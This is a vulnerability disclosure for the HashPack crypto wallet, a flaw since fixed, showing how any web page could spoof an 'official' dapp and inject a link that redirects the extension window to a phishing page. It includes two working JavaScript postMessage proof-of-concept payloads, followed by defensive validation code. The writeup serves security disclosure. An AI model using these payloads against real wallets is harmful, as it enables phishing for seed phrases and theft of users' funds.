HashPack vulnerability can induce victims to accept fake dapps and redirect them to other websites

When a dapp sends a postMessage to connect to the HashPack wallet, the message looks like this:

{"type":"hashconnect-connect-extension","pairingString":"eyJtZXRhZGF0YSI6eyJuYW1lIjoiZEFwcCBFeGFtcGxlIiwiZGVzY3JpcHRpb24iOiJBbiBleGFtcGxlIGhlZGVyYSBkQXBwIiwiaWNvbiI6Imh0dHBzOi8vd3d3Lmhhc2hwYWNrLmFwcC9pbWcvbG9nby5zdmciLCJwdWJsaWNLZXkiOiI4OGU4YjE0NC1jOGQ1LTRmMTctODdhNi03YTZhNmY3NGRhNWQiLCJ1cmwiOiJodHRwcyYjNTg7JiM0NzsmIzQ3O2hhc2hwYWNrLmdpdGh1Yi5pbyJ9LCJ0b3BpYyI6ImY3ZTg4NDVjLTI1Y2UtNDAyZS04MzBjLTZlZTc2ZWZiMWE2NyIsIm5ldHdvcmsiOiJ0ZXN0bmV0IiwibXVsdGlBY2NvdW50Ijp0cnVlfQ=="}

Decoding the base64 pairing string gives:

{"metadata":{"name":"dApp Example","description":"An example hedera dApp","icon":"https://www.hashpack.app/img/logo.svg","publicKey":"88e8b144-c8d5-4f17-87a6-7a6a6f74da5d","url":"https://hashpack.github.io"},"topic":"f7e8845c-25ce-402e-830c-6ee76efb1a67","network":"testnet","multiAccount":true}

So name, description, icon and url can all be swapped for other values; the problem is that any dapp, served from any URL in the browser, can trick a user into thinking it is an official dapp. Other wallets use the origin of the postMessage to prove the validity of the dapp: the wallet shows the origin URL of the dapp rather than a value the dapp chose. Without that check, an attacker can do this:

Full PoC:

// Pairing payload with attacker-chosen name, description, icon and url (no real URL required)
const js = `{"metadata":{"name":"hashpack official dapp","description":"this is a official hashpack dapp, dont trust in other dapps","icon":"https://uploads-ssl.webflow.com/61ce2e4bcaa2660da2bb419e/61cf5cc71c9324950d7e071d_logo-colour-white.svg","publicKey":"db1cc1e2-db77-4ee3-b373-cbca344f771f","url":"connect to unlock new functionalities"},"topic":"150d2a18-bec6-4d55-9589-354bed842e3e","network":"testnet","multiAccount":true}`;

// Sent from any page; the wallet renders the claimed metadata instead of the sender's origin
postMessage({
  "type": "hashconnect-connect-extension",
  "pairingString": btoa(js)
}, '*');

Another thing that happens in the HashPack wallet, and which can actually be more dangerous, is that the url parameter accepts any link (<a href=https://example.com>click here</a>) and the wallet does not add target=_blank to these links. So if the user clicks the link, the browser extension window itself is redirected to https://example.com, which can host a fake form asking the user to log in or do something else dangerous for their wallet, even a fake page asking the user for their seed phrase.

Full PoC:

// Same payload, but the url field now carries an HTML anchor that the wallet renders as a live link
const js = `{"metadata":{"name":"hashpack official dapp","description":"this is a official hashpack dapp, dont trust in other dapps","icon":"https://uploads-ssl.webflow.com/61ce2e4bcaa2660da2bb419e/61cf5cc71c9324950d7e071d_logo-colour-white.svg","publicKey":"db1cc1e2-db77-4ee3-b373-cbca344f771f","url":"<a href='https://webhook.site/1cc29a42-d511-44f5-a545-a78832f5956d'>click here</a> to unlock new functionalities"},"topic":"150d2a18-bec6-4d55-9589-354bed842e3e","network":"testnet","multiAccount":true}`;

postMessage({
  "type": "hashconnect-connect-extension",
  "pairingString": btoa(js)
}, '*');

After clicking "click here":

This is basically HTML injection; however, for wallets it can be dangerous, since a user may be handling large amounts within their wallet, and vulnerabilities like this can compromise both their funds and their anonymity.
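As an added example, not HashPack's or HashConnect's own code, here is a wallet-side handler that applies the two mitigations this writeup points at: it binds the dapp's claimed url to the browser-supplied postMessage origin (which the sending page cannot forge), and it renders every metadata field as escaped text so an injected anchor tag is displayed literally instead of becoming a clickable link. The message shape and field names come from the page; the function names, the sample origins and the zeroed topic id are assumptions made for illustration.

```javascript
// Added example (not HashPack/HashConnect code): wallet-side validation of the
// "hashconnect-connect-extension" message. Runs under Node (Buffer and URL are globals).

const EXPECTED_TYPE = "hashconnect-connect-extension";

// Decode a base64 pairing string into its JSON object; null if it is malformed.
function decodePairingString(pairingString) {
  try {
    const json = Buffer.from(String(pairingString), "base64").toString("utf8");
    const parsed = JSON.parse(json);
    return parsed && typeof parsed === "object" ? parsed : null;
  } catch (e) {
    return null;
  }
}

// Escape the characters that matter when text is placed into HTML, so a value like
// "<a href=...>click here</a>" is shown literally rather than rendered as a link.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Validate one MessageEvent-like object ({origin, data}).
// Returns {ok: true, display: {...}} for a message the wallet may show the user,
// or {ok: false, reason} for one it must drop.
function validatePairingMessage(event) {
  const { origin, data } = event;
  if (!data || data.type !== EXPECTED_TYPE) {
    return { ok: false, reason: "unexpected message type" };
  }
  const pairing = decodePairingString(data.pairingString);
  if (!pairing || !pairing.metadata) {
    return { ok: false, reason: "malformed pairing string" };
  }
  const { metadata } = pairing;

  // metadata.url must parse as an absolute https URL; free text or an HTML tag is rejected here.
  let claimed;
  try {
    claimed = new URL(metadata.url);
  } catch (e) {
    return { ok: false, reason: "metadata.url is not a URL" };
  }
  if (claimed.protocol !== "https:") {
    return { ok: false, reason: "metadata.url must be https" };
  }
  // The browser sets event.origin; a page cannot claim to be a different site.
  if (claimed.origin !== origin) {
    return { ok: false, reason: `claimed ${claimed.origin} but message came from ${origin}` };
  }
  // What the wallet displays: the browser-supplied origin plus escaped, text-only metadata.
  return {
    ok: true,
    display: {
      origin,
      name: escapeHtml(metadata.name ?? ""),
      description: escapeHtml(metadata.description ?? ""),
      icon: escapeHtml(metadata.icon ?? ""),
    },
  };
}

// Build a constructed test message the way a dapp page would (topic id is a placeholder).
function makeEvent(origin, metadata) {
  const pairing = {
    metadata,
    topic: "00000000-0000-0000-0000-000000000000",
    network: "testnet",
    multiAccount: true,
  };
  const pairingString = Buffer.from(JSON.stringify(pairing)).toString("base64");
  return { origin, data: { type: EXPECTED_TYPE, pairingString } };
}

// Demo: a message modelled on the writeup's PoC, sent from an unrelated origin, is rejected.
console.log(validatePairingMessage(makeEvent("https://evil.example", {
  name: "hashpack official dapp",
  description: "this is a official hashpack dapp, dont trust in other dapps",
  icon: "https://www.hashpack.app/img/logo.svg",
  url: "<a href='https://example.com'>click here</a> to unlock new functionalities",
})));
```

In a real extension the `event` would be the `MessageEvent` delivered to `window.addEventListener("message", ...)`, and the pairing prompt would show `display.origin` as the primary identity of the dapp; `name` and `description` are then at most cosmetic, since the user sees where the request actually came from.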

Timeline

  • 09/05/2022 - reported the vulnerability
  • 14/05/2022 - awarded the bounty
  • 29/05/2022 - the HashPack team fixed the vulnerability